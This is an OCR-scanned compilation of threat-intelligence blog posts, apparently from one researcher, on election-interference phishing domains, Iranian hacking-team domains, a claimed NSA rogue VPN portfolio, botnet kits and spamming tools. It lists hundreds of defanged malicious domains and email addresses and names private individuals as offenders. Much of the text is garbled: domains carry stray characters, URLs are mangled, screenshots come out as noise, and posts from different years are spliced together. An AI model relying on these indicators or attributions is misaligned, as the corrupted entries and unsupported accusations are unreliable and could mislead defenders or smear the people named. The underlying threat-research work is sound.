There’s no such thing as a (quality) free botnet kit. What’s for free is often the leftovers from a 
single feature of a more sophisticated proprietary botnet kit. This one in particular is however 
trying to demonstrate that even a plain simple GUI botnet command and control software can 
achieve the results desired by an average script kiddie, and not necessarily satisfy the needs 
of the experienced botnet master 


15. [19]A Diverse Portfolio of Fake Security Software - Part Three 

As far as trends and fads are concerned, the majority of the domains are currently parked at 
up to four different IPs, with most of them going into a stand by mode once they get detected 
and reappear back couple of weeks later 
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Exposing a Personal Ransomware-Themed Email Address Portfolio - An OSINT Analysis 


Exposing a Personal Ransomware-Themed Email Address Portfolio - Part Two - An OSINT 
Analysis 


Exposing a Portfolio of Ashiyane Digital Security Team Hacking Tools - Direct Technical 
Collection Download - [RAR] 


Exposing a Portfolio of Personal Photos of Iran-Based Hacker and Hacker Teams and Groups 
- An OSINT Analysis 


Exposing a Rogue Domain Portfolio of Fake News Sites - WhoisXML API Analysis 
Exposing Bulgarian Cyber Army Hacking Group - An OSINT Analysis 
Exposing HackPhreak Hacking Group - An OSINT Analysis 


Exposing Personally Identifiable Information on Ashiyane Digital Security Group Team 
Members - An OSINT Analysis 


Exposing Random Koobface Botnet Related Screenshots - An OSINT Analysis 
Exposing Team Code Zero Hacking Group - An OSINT Analysis 


From the “Definitely Busted” Department - A Compilation of Personally Identifiable Infor- 
mation on Various Cyber Threat Actors Internationally - An OSINT Analysis - [PDF] 


Introducing Astalavista.box.sk’s “Threat Crawler” Project - Earn Cryptocurrency for Catch- 
ing the Bad Guys - Hardware Version Available 


Introducing Dancho Danchevs’s “Blog” Android Mobile Application - Google Play Version 
Available 


Malware - Future Trends - Research Paper - Copy 


Person on the U.S Secret Service Most Wanted Cybercriminals Identified Runs a Black 
Energy DDoS Botnet - WhoisXML API 


Profiling a Currently Active CoolWebSearch Domains Portfolio - WhoisXML API Analysis 


Profiling a Currently Active Domain Portfolio of Fake Job Proposition and Pharmaceutical 
Scam Domains - An OSINT Analysis 


Profiling a Currently Active Domain Portfolio of Pay-Per-Install Rogue and Fraudulent Affili- 
ate Network Domains - An OSINT Analysis 


Profiling a Currently Active Personal Email Address Portfolio of Members of Iran’s Ashiyane 
Digital Security Team - An OSINT Analysis 


Profiling a Currently Active Personal Email Addresses Portfolio Operated by Cybercriminals 
Internationally - An OSINT Analysis 


Profiling a Currently Active Portfolio of Rogue and Malicious Domains - An OSINT Analysis 


Profiling a Currently Active Portfolio of Scareware and Malicious Domain Registrants - His- 
torical OSINT 


Profiling a Currently Active Portfolio of Scareware Domains - Historical OSINT 
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Profiling a Currently Active Portfolio of Soam Domains that Hit ZDNet.com Circa - An OSINT 
Analysis 


Profiling a Currently Active Scareware Domains Portfolio - An OSINT Analysis 
¢ Profiling a Money Mule Recruitment Registrant Emails Portfolio - WhoisXML API Analysis 
¢ Profiling a Portfolio of Cybercriminal Email Addresses - WhoisXML API Analysis 


¢ Profiling a Portfolio of Personal Photos Courtesy of Koobface Botnet Master Anton Ko- 
rotchenko - An OSINT Analysis 


¢ Profiling a Portfolio of Personal Photos of Behrooz Kamalian Team Member of Ashiyane 
Digital Security Team - An OSINT Analysis 


¢ Profiling a Portfolio of Personally Identifiable OSINT Artifacts from Law Enforcement and 
OSINT Operation “Uncle George” - An OSINT Analysis 


¢ Profiling a Rogue Fast-Flux Botnet Infrastructure Currently Hosting Multiple Online Cyber- 
crime Enterprises - WhoisXML API Analysis 


Profiling Iran’s Hacking Scene Using Maltego - A Practical Case Study and a Qualitative 
Approach - An Analysis 


Profiling Russia’s U.S Election Interference - WhoisXML API Analysis 
¢ Profiling the “Jabber ZeuS” Rogue Botnet Enterprise - WhoisXML API Analysis 
¢ Profiling the Emotet Botnet C &C Infrastructure - An OSINT Analysis 


Profiling the Internet Connected Infrastructure of the Individuals on the U.S Sanctions List 
- WhoisXML API Analysis 


¢ Profiling the Liberty Front Press Network Online - WhoisXML API Analysis 


Profiling the U.S Election Interference - An OSINT Analysis 
¢ Random Photos from the “Lab” Circa up to Present Day - A Compilation 


¢ Sample Random Cybercrime Ecosystem Screenshots - A Compilation of Images - Direct 
Technical Collection Download - An Analysis 


* Sample Random Cybercrime Ecosystem Screenshots - A Compilation of , Images - An 
Analysis 


¢ Sample Random Cybercrime Ecosystem Screenshots - A Compilation of , Images - An 
Analysis 


* Sample Random Cybercrime Ecosystem Screenshots - A Compilation of Images - An Anal- 
ysis 


Security Researchers Targeted in Spear Phishing Campaign - WhoisXML API Analysis 


¢ Shots from the Wild West - Random Cybercrime Ecosystem Screenshots - An OSINT Anal- 
ysis - Part Three 


¢ The Pareto Botnet - Advanced Cross-Platform Android Malware Using Amazon AWS Spotted 
in the Wild - WhoisXML API Analysis 
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¢ Who’s Behind the Conficker Botnet? - WhoisXML API Analysis 


¢ Who’s on Twitter? 


Stay tuned! 


1. https://blogger.googleusercontent .com/img/a/AVvXsEj oNDGoVYj jW- JaQlKC3nV8dVCdA_482- j7PH23rUbdxiJWTaigL7g9M 


wDSw669ZwDBXVMWSVbGe7 i0auJOA30TXtHS5y IrUHJA69XBQAFtcgP 
2. https://offensive-warfare.com/ 


18.1.14 Exposing a Currently Active List of Iran-Based Hacker and Hacker Team’s 
Handles - An OSINT Analysis - Part Two (2022-01-26 22:45) 


18.1.15 Profiling Russia’s U.S Election Interference 2016 - An OSINT Analysis 
(2022-01-27 02:00) 


[1] 


@ 


Note: This OSINT analysis has been originally published at my current employer’s Web site - 
[2]https://whoisxmlapi.com where I’m currently acting as a DNS Threat Researcher since Jan- 
uary, 2021. 


We've decided to take a closer look at the U.S Elecetion 2016 interference provoked by several 
spear phishing and malicious campaigns courtesy of Russia for the purpose of offering and pro- 
viding actionable threat intelligence including possible attribution clues for some of the known 
participants in this campaign potentially assisting fellow researchers and Law Enforcement on 
its way to track down and prosecute the cybercriminals behind these campaigns. 


In this analysis we'll take a closer look at the Internet connected infrastructure behind the U.S 
Election 2016 campaign in terms of malicious activity and offer practical and relevant including 
actionable threat intelligence on their whereabouts. 


Sample malicious and fraudulent C &C domains known to have participated in the U.S Elec- 
tions 2016 campaign: 


linuxkrnl[. ]net 
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accounts-qooqle[.]com 
account-gooogle[.]Jcom 
accoounts-google[.]com 
account-yahoo[.]com 
accounts-googlc[.]com 
accoutns-google[.]com 
addmereger[.]com 
akamainet[.]net 
akamaivirusscan[.]com 
apple-icloud-services[.]com 
apple-notification[.]com 
arabianbusinessreport[.]com 
azamtelecom[.]com 
babylonn[.]Jcom 
baengmail[.Jcom 
boobleg[.]Jcom 
chinainternetservices[.]Jcom 
com-hdkurknfkjdnkrnngujdknhgfr[.Jcom 
combin-banska-stiavnica[.]com 
cvk-leaks[.]com 
fb-security[.]com 
gO0Oqgle[.]com 
global-exchange[.]net 
googlesetting[.]Jcom 
hibnk[.]Jcom 
homesecuritysystems-sale[.]com 
icloud-localisation[.]Jcom 
imperialcOnsult[.]com 
informationen24[.]Jcom 
interglobalswiss[.]com 
intra-asiarisk[.]Jcom 
invest-sro[.]Jcom 
iphone-onlineshopping[.]net 
kur4[.]com 

lastdmp[.]Jcom 
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localisation-apple-icloud[.Jcom 
localisation-apple-support[.]com 
localisation-mail[.]com 
login-163[.]Jcom 
login-kundenservice[.]com 
magic-exchange[.]com 
mail-apple-icloud[.Jcom 
mailpho[.]Jcom 
malprosoft[.]com 
medicalalertgroup[.]com 
megafileuploader[.]com 
mfadaily[.]Jcom 
mfapress[.]com 
militaryexponews[.]com 
msoftonline[.]com 
myaccountgoogle[.]Jcom 
myaccountsgoogle[.]Jcom 
mydomainlookup[.]net 
mypmpcert[.]com 
net-a-porter-coupon[.]com 
newiphone-online[.]net 
newiphone-supply[.]net 
newreviewgames[.]com 
nobel-labs[.]net 
nvidiaupdate[.]com 
obamacarerx[.]net 
onlinecsportal[.Jcom 
pass-google[.]Jcom 
password-google[.]Jcom 
paydaytoday-uk[.]Jcom 
pb-forum[.]com 
planetaryprogeneration[.]Jcom 
regionoline[.]com 
security-notifications[.]com 


service-facebook[.]com 
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servicesupdates[.]com 
set121[.]com 

set132[.]com 

set133[.]com 
sicherheitsteam-pp[.]com 
sicherheitsteam-ppl[.]net 
skypeupdate[.]com 
smp-cz[.]Jcom 
soft-storage[.]Jcom 
solutionmanualtestbank[.]Jcom 
ssl-icloud[.]com 
team-google[.]com 
techlicenses[.]com 
techlicenses[.]net 
ua-freedom[.]com 
updates-verify[.]Jcom 
us-mg7mail-transferservice[.]com 
us-westmail-undeliversystem[.]com 
us6-yahoo[.]com 
vatican[.]com 
wordpressjointventure[.]com 
ya-support[.Jcom 
yandex-site[.]com 
yepost[.]com 


Related malicious and fraudulent emails known to have participated in the U[.]S Elections 
2016 campaign: 


julienobruno@hotmail[.]Jcom 
jennal[.]stehr@mail[.]Jcom 
s[.]simonis@mail[.]Jcom 
domreg@247livesupport[.]biz 
kumarhpt@yahoo[.]com 
aksnes[.]thomas@yahoo[.]com 
yingw90@yahoo[.]com 

andre _roy@mail[.]Jcom 
myprimaryreger@gmail[.]com 
okorsukov@yahoo[.]com 
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tzubtfpx5@mail[.]ru 
annaablony@mail[.Jcom 
jamesyip823@gmaill.Jcom 
tmazaker@gmaill[.]Jcom 
emmer[.]brown@mail[.]Jcom 
qupton@mail[.]Jcom 
adel[.Jrice@maill[.]com 
trainerkart2@gmail[.]Jcom 
cowrob@mail[.]Jcom 
direct2playstore@gmail[.]Jcom 
cffaccll@maill[.Jcom 
drgtradingllc@gmail[.]Jcom 
jack2020@outlook[.]Jcom 
pdkt00@Safe-maill[.]net 

david thompson62@aoll.]com 
distardrupp@gmail[.]Jcom 
perplencorp@gmail[.Jcom 
spammer11@superrito[.]Jcom 
jilberaner@yahoo[.]de 
snowyowl@jpnsec[.]Jcom 
asainchuk@gmaill[.]Jcom 
OKEKECHIDIC@GMAIL[.]COM 
abelinmarcel@outlook{[. ]fr 
idesk[.]corp[.]apple[.Jcom@gmail[.]Jcom 
mutantcode@outlook[. ]fr 
pier@pipimerah[.]com 
vrickson@mail[.]Jcom 

prabhakar malreddy@yahoo[.]com 
Sample related email Known to have participated in the U[.]S Elections 2016 campaign: 
jack2020@outlook[.Jcom 


Sample Maltego Graph of a sample malicious and fraudulent domain registrant known to have 
participated in the U.S Election 2016 campaign: 


[3] 
@ 3) oe 


ee 
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Sample related domains known to have participated in the U.S Elections 2016 campaign: 
support-forum[.]org 
oceaninformation[.]org 
vodafoneupdate[.]org 
succourtion[.]org 

eascd[.Jorg 
northropgruman|[. Jorg 
apple-iphone-services[.]Jcom 
localisation-security-icloud[.]Jcom 
applesecurity-supporticloud[.]com 
icloud-iphone-services[.]com 
icloud-id-localisation[.]Jcom 
apple-localisation-id[.]com 
identification-icloud-id[.]Jcom 
cloud-id-localisation[.]Jcom 
support-security-icloud[.]com 
identification-apple-id[.]com 
localisation-apple-security[.]Jcom 
security-icloud-localisation[.]Jcom 
dabocom[.]com 
quick-exchange[.]com 
hyganil.Jcom 

hztx88[.]com 

sddaqgs[.]net 

qufu001[.]Jcom 

lutushiqil[.Jcom 

gsctgs[.]Jcom 

tazehong[.]com 

hthgj[.]Jcom 

kvistberga[.]com 

bjytj[.]Jnet 

cqhuicang[.]Jcom 
softbank-tech[.]Jcom 
osce-press[.Jorg 

maxidea[.]tw 
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sdti[.]tw 

gmailcom[. ]tw 

zex[.]tw 
gain-paris-notaire[. ]fr 
loto-fdj[.]fr 
client-amzonl[. ]fr 
idse-orange[.]fr 
rgraduzkfghgd[.]com 
jmhgjqtmhanoncp[.]com 
stwdchstclovuzk[.]com 
puxqtyrwzuzybgzehc[.]Jcom 
maatil[.]Jcom[.]ng 
surestbookings[.]com 
asatuyouth[.]org[.]ng 
hannal[.]ng 
hostlink[.]com[.]ng 
sirbenlimited[.]com 
dce[.Jedu[.]ng 
eventsms[.]com[.]ng 
krsoczmxwdsjwtizmx[.]com 
alizirwzyjazurof[.]com 
zslipanehule[.]com 
cxotonspmjkxw[.]com 
wpifmhyjkxyt[.]com 
ngvsngpwdidmn|[.]com 
imperialvillas[.]Jcom[.]ng 
lipyhgpofsnifste[.]com 
flexceeweb[.]com 
fgfcpkdcnebgduls[.]Jcom 
shinjiru[.]us 
supportchannel[.]net 
couponofferte[.]com 
psepaperindustrial[.Jcom 
lakws[.]com 


perplencorp[.Jcom 
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lbchemtrade[.]Jcom 
viaggibelli[.]com 
liontitco[.]Jcom 
svendiamo[.]com 
orogenicgroup[.]com 
giudeviaggio[.]com 
greenskill[.]net 
siteseditor[.]net 
e-mail-supports[.]Jcom 
biplen[.Jcom 
infradesajohor[.]com 
dealhot[.]net 
suanmin[.]com 
on9on9[.]com 
accoutns-google[.]com 
puronig[.]Jcom 
singa[.]Jcom 
sadihadil[.]Jcom 
mrangkang[.]com 
terumbul[.]com 
phygitail[.]Jcom 
veraniq[.]Jcom 
potxr[.]Jcom 
icraw[.]Jcom 
thearoid[.]Jcom 
teempo[.]Jcom 
parblue[.]Jcom 
mydomainlookup[.]net 
adrianvonziegler[.]net 
zetindustries[.]com 
researchs[.]com[.]ng 
joymoontech[.]com 
researchmaterials[.]com[.]ng 
james823[.]com 
oneibeauty[.]net 
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16. [20]Fake Celebrity Video Sites Serving Malware - Part Two 

Due to the template-ization of fake celebrity video sites, and simple traffic management tools 
combined with blackhat SEO tactics, these sites are also prone to increase in the next couple 
of months 


17. [21]Web Based Botnet Command and Control Kit 2.0 

It’s releases like these that remind us of the amount of time, efforts and personal touch that 
a malicious attacker would put into such a management kit, currently acting as a personal 
benchmark as far as complexity and features indicating the coder’s experience with botnets 
is concerned. What’s he’s failing to anticipate is that this kit is sooner or later going to turn 
into the "MPack of botnet management" 


18. [22]A Diverse Portfolio of Fake Security Software - Part Four 
Keep it coming, we’ll keep it exposing until we end up getting down to the "fake software 
vendor" itself 


19. [23]Automatic Email Harvesting 2.0 

Email harvesting is slowly maturing into a vertically integrated service provided by vendors 
of managed spamming services. This email harvesting module is aiming to close the page 
on text obfuscation in respect to fighting spam, and is successfully recognizing and collecting 
such publicly available emails. From a psychological perspective though, the end users who 
bothered to obfuscate their emails are less likely to fall victims into phishing scams, with the 
obfuscation speaking for a relatively decent situational awareness on how they emails end up 
in a Spammer’s campaign 


20. [24]Fake Porn Sites Serving Malware - Part Three 

As a firm believer in sampling in order to draw conclusions on the big picture, an approach 
that has proven highly accurate in modeling historical and upcoming tactics and behavior, a 
single fake porn site serving malware campaign usually exposes a dozen of misconfigured 
redirectors, which thanks to their misconfiguration despite the evasive features available 
within the kits, expose another dozen of malware campaigns 


21. [25]Facebook Malware Campaigns Rotating Tactics 

With no particular flaw exploited other than the social engineering tactic of using already 
compromised Facebook accounts who would automatically spam all their friends with links 
to flash files hosted at legitimate services, the more persistent the campaign is, the higher 
the chance that it will scale enough. This campaign in particular is mainly relying on rotation 
of tactics, namely different messages, different services and file extensions used in order to 
trick someone’s friend into visiting the URL. With the number of users increasing, the most 
popular social networking sites are naturally going to be permanently under attacks from 
cybercriminals 


22. [26]Fake Security Software Domains Serving Exploits 

Despite that it’s a single brand, namely the International Virus Research Lab that’s introducing 
client-side exploits within it’s portfolio of domains, the opportunity for abuse may be noticed 
by the rest of the brands pretty fast 


23. [27]Exposing India’s CAPTCHA Solving Economy 
Taking into consideration the mentality surrounding a particular country’s cybercriminals, 
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We'll continue monitoring the campaign and post updates as soon as new developments take 
place. 


Stay tuned! 


1, https: blogger. googleusercontent ,con/ing/a/AVkeEnB9¥4eQihd pie vUGRI7OKV-NEOKRNTRphhFaeruFuUplrx108Yghe 
2, https://shoisinleps.con/ 
3. httpe:/ blogger. googleusercontent. con/ing/a/AVWRsEAZVbTa G71 SUR9bnTSSAiSGenkTakeSodaS xr ab760BvcakDeFhe 


18.1.16 Exposing a Currently Active Domain Portfolio Managed and Operated 
by Members of the Ashiyane Digital Security Team - An OSINT Analysis 
(2022-01-27 02:00) 


[1] 


$355 0° 0 $35 2° $355 288 « $E85 82° 00 00 FFF 00 00 o 8° $593 
. 333* 


Note: This OSINT analysis has been originally published at my current employer’s Web site - 
[2]https://whoisxmlapi.com where I’m currently acting as a DNS Threat Researcher since Jan- 
uary, 2021. We’ve decided to take a closer look at the current and historical domain portfolio 
managed and operated by members of Iran’s Ashiyane Digital Security Team using Maltego in 
combination with WhoisXML API’s integration for the purpose of providing actionable threat in- 
telligence including to assist fellow researchers vendors and organization on their way to track 
down and monitor the Internet connected infrastructure of key members of Iran’s Ashiyane 
Digital Security Team for the purpose of monitoring it and attempting to take it offline. 


In this article we'll provide actionable intelligence on some of the currently active domains 
managed run and operated by Iran’s Ashiyane Digital Security Team with the idea to assist 
fellow researchers vendors and organizations on their way to track down and monitor the in- 
frastructure managed run and operated by Iran’s Ashiyane Digital Security Team. 


A list of currently active domain portfolio known to be managed and operated by members of 
Iran’s Ashiyane Digital Security Team: 


life-guard[.]ir 
sepahan-trans[. ir 
kashanitL. ir 
websazangroup[. Jir 
namvarnameybastan[. Jir 
ashiyane-ads[.]Jcom 
tamamkar-chalous[. ]ir 
padidehafagh[.]com 
padideafagh[.]com 
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bahmanshahreza[.]com 
vatanpaydar[.]com 
pkpersian[.]net 
xn-wgba3di6y7p[.]com 
jonoobhost[.]net 
mahmoudbahmani. Jir 
piremehrf. Jir 
shahrepars[. Jir 
3diamond[. Jir 
mhdcard[.]Jcom 
ashiyanecrm[.]Jcom 
tabta2[.]Jcom 
ashiyane-bot[.]ir 
projejob[. ir 

rizone[. Jir 

iedb[. Jir 

unmobile[. ]ir 
razmaraa{. Jir 
tabrizigold[.]ir 
galleryfirozeh[. ]ir 
foroozanborj[.]ir 
unicornart[. Jir 
rahnamayeiran[. lir 
iranhackf[. ]ir 
shomalbeauty[. ir 
andishehig[. Jir 
meelk[. Jir 
tamamkar-sari[. Jir 
namehybastan[. ir 
chemiiranl[. ]ir 


A list of currently active domain portfolio known to have been registered managed and oper- 
ated by members of Iran’s Ashiyane Digital Security Team: 


websazanco[. ir 
rahnamayeiran[. lir 
maz-laaf[.]ir 
esnikan[. ]ir 
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foroozanbor/j[. Jir 
royall-shop[. Jir 
ashiyane[. Jir 
chemiiran[. Jir 
account-yahoo[.]com 
arshiasanat-baboll. ir 
ashiyane-ads[.]com 
jahandarco[. ir 
momtazbarbari[. Jir 
pouyaandishan-mazand[. ]ir 
shomalbeauty[.]ir 
tractorsazi[.]com 
aleyaasin[.]Jcom 
farsmarket[.]com 
englishdl[.]Jcom 
zproje[. ir 
projejob[. Jir 
songdownload[.]ir 
ashiyanesms[.]com 
ihybrid[.]Jus 
drsjalili[.]Jcom 
ashiyane[.]org 
ashiyanecrm[.]com 
ashiyanehost[.]com 
ashiyanex[.]com 
rasht-samacollege|[.lir 
instapacks[. Jir 
bahmanshahreza[.]com 
shaahrezal[.]com 
shahrezanews[.]com 
taktaweb[.]net 
javannovin[.]Jcom 
padidehafagh[.]com 
padideafagh[.]com 


sahebnews[.]com 
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nasiri[. info 
taktaweb[.]Jorg 
bamemar[.]Jcom 
talakesht[.]com 
sepahan-trans[. Jir 
opencart5[.]ir 
rasulsh[. Jir 
kashanitL. Jir 
facebooktu[.]com 
life-guard[. ir 
prOgrammers[.]ir 
lammerf[. ]ir 
sepahantransl[. ir 
facecode[.]ir 
iranhack[.]org 
aryanenergy[.]org 
khsmt-sabzevar[.]com 
orveh[.]com 
tipec[.Jorg 
iranhack[.]ir 
shantya3d[.]ir 
razmaraal. lir 
soroshland[. ]ir 
galleryfirozeh[. Jir 
unicornart[. Jir 
shahreparsl. Jir 
3diamond[. Jir 
ashiyane-bot[.]ir 
mahmoudbahmani[. Jir 
piremehrf. Jir 
dcligner[.]Jcom 
tabta2[.]Jcom 
chipiran[.]org 
ashiyanebot[. ]ir 
bnls[. Jir 
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lamroid[.Jcom 
persiandutyfree[.]com 
iran3erver[.]Jcom 
hivacom[.]com 
irantwitter[.]com 
persian-pasargad[.]com 
chatafg[.]Jcom 
kasraprofile[.]com 
gharnict[.]com 
minachoob[.]Jcom 
gigmeg[.]Jcom 
shoka-chat[.]com 
serajmehr[.]com 
asrarweb[.]com 
niazezamuneh[.]com 
sana-mobile[.]Jcom 
rizone[. Jir 

iedb[. ]ir 
unmobile[. ]ir 
progmans[.]com 
design84u[.]com 
istgah-salavati[.]com 
iranhack[.]net 
shantya3d[.]com 
kamelannews[.]com 
rangeshab[.]com 
dihim[.Jcom 
hdphysics[.]Jcom 
cgsolar[.]net 
vahidelmil. ir 
maincoretechnology[.]com 
bastanteam[.]com 
vvfa[.]Jcom 
Irsecteam[.]org 


We'll continue to monitor for new domain registrations courtesy of Iran’s Ashiyane Digital Se- 
curity Team and we'll post updates as soon as new developments take place. 
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Stay tuned! 


1. https://blogger . googleusercontent .com/img/a/AVvXsEihJ_mAYRTgpXEJZeTtUD- j-o_X3ukUJOIfeVw4-xvK4aCMFPgscZ3PZi 
SV9OD56gMXC7 gd3pK j XXs8CUgeBVbOzD2s j MWADki-faL-qfb55Ld 


2. https://whoisxmlapi.com/ 


18.1.17 Exposing a Currently Active Free Rogue VPN Domains Portfolio Courtesy of 
the NSA - An OSINT Analysis (2022-01-27 02:00) 


@ 


2alfam an@qmail.com 


[1] 


Note: This OSINT analysis has been originally published at my current employer’s Web site - 
[2]https://whoisxmlapi.com where I’m currently acting as a DNS Threat Researcher since 
January, 2021. 


We've recently came across to a currently active free VPN domains portfolio which based on 
ourn research and publicly accessible sources appears to be run and operated by the NSA 
where the ultimate goal would be to trick users into using these rogue and bogus free VPN 
service providers in particular Iran-based users where the ultimate goal would be to monitor 
an eavesdrop on their Internet activities and we’ve decided to take a deeper look inside the 
Internet-connected infrastructure of these domains and offer practical and relevant threat in- 
telligence and cyber attack attribution details on the true origins of the campaign. 


In this case study we'll offer practical and relevant technical information on the Internet- 
connected infrastructure of this campaign with the idea to assist the security community on 
its way to track down and monitor this campaign including to offer actual cyber attack and 
cyber campaign attribution clues which could come handy to a security researcher or a threat 
intelligence analyst on their way to track down and monitor the campaign. 


[3] 
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how they think, how they operate, what do they define as an opportunity, and how much 
personal efforts are they willing to put into their campaigns, | wouldn’t be surpised if a Russian 
vendor offering 100,000 bogus Gmail accounts for sale has in fact outsourcing the account 
registration process to Indian workers, paid them pocket change and is then reselling them 
ten to twenty times higher than the price he originally paid for them. 


The text based CAPTCHAs used at the major Internet portals and services, are so effi- 
ciently abused by this approach that continuing to use is directly undermining the trust these 
email providers and services often come with as granted 


http: /Adanchoy.blogopot.cou/2008/07 summarizing junes-threatcape hin 
ORs etcetera eigen eaercere 
ttp://ddanchev .blogspot.com/2008/08/mcafees-site-advisor-blocking-nruns-ag.htm 
[ere eee ee eT 
_nvtp://Adanchey blogspot. cou/2008/06 /conprowised-seb~servers~serving-fake. hl 
Tire oases tices omens pias cece Ge cesseetg cl 


ttp://ddanchev. blogspot .com/2008/08/phishers-backdooring-phishing-pages-to.htm 


ttp://ddanchev.blogspot.com/2008/08/email-hacking- going-commercial-part-two.htm 


. http: //ddanchev. blogspot .com/2008/08/russia-vs-georgia-cyber-attack.htm 
. http://intelfusion.net/wordpress/?p=398 


ttp://blogs.nyu.edu/blogs/agc282/zia/2008/08/intelfusions_sna_of_russian_cy.htm 
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12. http://ddanchev. blogspot .com/2008/08/76service-cybercrime-as-service-going .htm 
13. http://ddanchev. blogspot . com/2008/08/whos-behind-georgia-cyber-attacks.htm 
14. http://ddanchev. blogspot .com/2008/08/guerilla-marketing-for-conspiracy-site.htm 
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. http://ddanchev. blogspot .com/2008/08/banker-malware-targetting-brazilian.htm 
. http://ddanchev. blogspot .com/2008/08/compromised-cpanel-accounts-for-sale.htm 
. http://ddanchev. blogspot .com/2008/08/diverse-portfolio-of-fake-security.htm 


ttp://ddanchev. blogspot .com/2008/08/diy-botnet-kit-promising-eternal .htm 
ttp://ddanchev. blogspot .com/2008/08/diverse-portfolio-of-fake-security_20.htm 
ttp://ddanchev. blogspot .com/2008/08/fake-celebrity-video-sites-serving. htm 


. http: //ddanchev. blogspot .com/2008/08/web-based-botnet-command-and-control.htm 
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ttp://ddanchev. blogspot .com/2008/08/diverse-portfolio-of-fake-security_25.htm 


_http://adanchev blogspot .con/2008/08/autonatic~enail-harvesting-20. html] 
| http://adanchey blogspot .con/2008/08/ake-porn-sites-serving-nalvare- part hal 
_hetp://adanchey blogspot .con/2008/08/facebook-nalvare~canpaigne-rotat ing. hen] 
_http://adanchey blogspot .con/2008/08/ake- security-software~donains-serving hia 


ttp://ddanchev. blogspot . com/2008/08/exposing- indias- captcha-solving-economy.htm 
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4.9.6 Adult Network of 1448 Domains Compromised (2008-09-15 13:13) 
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‘ i>5-1\ 
mp 5! BENG | 


Shop Domain Manager Renewal Manager Quantity Discounts Customer Settings 
| Domain View: Sort Domains: Q SearchFor: B 
‘basic domain y| | alphabetic list v Or [ 7 J Ey 
Pag 12234568222 10 >> GoTo! 
1448 Domains - Displaying 25 per page - Alphabetic List - Page 1 of 58. 

[ Domain Status — hased Expires 
1 debe hi th om.com Active 24-May-2004 24-May-2014 
| 1) wanat ss on Active 29-Jul-2005 29-Jul-2014 BaR 
/@ Mde wh m Active 13-May-2004 25-Feb-2012 BBA 
a wide w hi o Active 06-Mar-2005 26-Dec-2011 BR 
m Mde woh t Active 13-May-2004 25-Feb-2012 BEaR 
a eshte p is m Active 10-Mar-2008 10-Mar-2011 BBR 
al emo: fit .o 1 Active 17-Oct-2005 17-Oct-2012 BaR 
a mod in ce . Active 17-Oct-2005 17-Oct-2012 BER 
a teurr is ut Active 07-Nov-2004 12-Dec-2010 BeaR 
m tours is wt af Active 07-Nov-2004 12-Dec-2008 BER 
ar milfs oF Active 13-May-2004 10-Dec-2011 BER 
a milfs Active 06-Mar-2005 26-Dec-2011 BAR 
am mnitfs et Active 13-May-2004 10-Dec-2011 aeA 
a milfs m Active 14-May-2004 10-Dec-2011 BBR 
| a milfs fo Active 06-Mar-2005 26-Dec-2011 BEaR 
mm milfs 4 Active 13-May-2004 10-Dec-2011 BBR 
a wep: ix Mm Active 03-Aug-2006 20-Nov-2010 BER 
m 3574 n Active 07-Nov-2004 23-Jul-2009 BaR 
| @ wade on Active 06-Jun-2007 16-Apr-2010 BEAR 
| m@ wade cot Active 06-Jun-2007 16-Apr-2010 BaR 
® atho 20} Active 14-Nov-2003 14-Nov-2011 BEaR 
m atho 1 Active 14-Nov-2003 14-Nov-2011 BABAR 
@ thon Active 14-Nov-2003 14-Nov-2011 BBR 
= thon Active 14-Nov-2003 14-Nov-2011 BER 
a thon io | Active 14-Nov-2003 14-Nov-2011 BEaR 

Status Purchased Expires 

24567 3 9 10 => GoTo: Go | 


With millions of malware infected PCs participating in a botnet, the probability that a high 
profile end user whose domain portfolio consisting of over 1,400 high trafficked adult web 
sites, would end up having [1]his accounting data stolen, is gradually increasing. 


That seems to be the case with the CPanel of the [2]Bang Bros network of adult web 
sites, the accounting data for which was obtained through a botnet in which the administrator 
seems to have been unknowingly participating in. None of the sites have been embedded 
with malware so far, however, taking into consideration the high traffic this adult network 
attracts as well as the fact that he person managing the domains portfolio is part of a botnet, 
that may change pretty fast. 
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Last login from —— =. = sg = 
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A single malware infection always triggers the entire malicious effect, from the malware 
automatically SQL injection vulnerable sites, and providing infrastructure for scams and 
fraudulent activities, to allowing the botnet master to parse the huge log of stolen accounting 
data and look for Cpanels and anything allowing him to efficiently compromise a network of 
sites he wouldn’t have been able to compromise if it wasn’t the "weakest link" centralizing the 
entire portfolio in a single location. 


And whereas for the time being, propositions for selling compromised CPanel accounts 
are mostly random, in the long term, fueled by the demand for compromised domains, we 
may witness the emergence of yet another market segment in the underground economy, with 
price ranges based on the pagerank of the domain in question, the type of browsers and the 
traffic sources visiting it. Until then, [3]SQL injections through search engines reconnaissance 
executed through a botnet, will remain the efficient tactic of choice for abusing legitimate 
domains as redirectors to malicious ones. 


1. http://ddanchev. blogspot .com/2008/08/compromised-cpanel-accounts-for-sale.htm 
2. http://en.wikipedia. org/wiki/Bang Bros 


3. http: //ddanchev. blogspot .com/2007/07/sql-injection-through-search-engines.htm 


4.9.7 Skype Spamming Tool in the Wild - Part Two (2008-09-15 14:55) 
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Log | Authoraation Menage | Send Meveage| Contny Ust | Settings | Statetice 
Auth mevages and mestager 


Ah meiiages tent © 
Metteger tent 0 
Added to contact ket: 0 
Added percent cons 


The less technologically sophisticated lone cybercriminals have always enjoyed the benefits 
of stand alone DIY applications. From [1]DIY exploit embedding tools in a [2]Cybercrime 1.0 
world, maturing to today’s [3]web malware exploitation kits and their [4]copycat alternatives, 
to plain simple spamming tools that matured into [5]today’s managed spamming services 
already starting to offer spamming services beyond email, stand alone spamming applications 
remain pretty popular. 


With yet another [6]Skype spamming tool released in the wild, which just like the previ- 
ous one | discussed a couple of months relies on Skype’s support for wildcast searches, and 
is spamming with authorization request messages until the user adds the contact, malicious 
parties seems to be more interested into supplying the desired services, than emphasizing on 
the quality assurance process. 


Despite the possibilities for localized targeted attacks delivering messages with malicious 
URLs into the user’s native language, benchmarking this tool’s features next to the ones 
offered by certain bots taking advantage of social engineering by spamming the infected 
host’s contacts, is positioning it far behind even the most primitive IM spreading bot modules, 
whose extra layer of social engineering personalization makes their IM malware campaigns 
much more effective ones. 


Related posts: 

[7]Harvesting Youtube Usernames for Spamming 
[8]Uncovering a MSN Social Engineering Scam 
[9]MSN Spamming Bot 

[10]DIY Fake MSN Client Stealing Passwords 
[11]Thousands of IM Screen Names in the Wild 
[12]Yahoo Messenger Controlled Malware 


1. http: //ddanchev. blogspot. com/2007/09/diy-exploits-embedding- tools. html 

2. http: //ddanchev. blogspot .com/2008/04/diy-exploit-embedding-tool-proprietary.htm 
5 cep //aencuey Siepacse,coe/2008(08/ noe see oeare cocmencene cacrou meal 
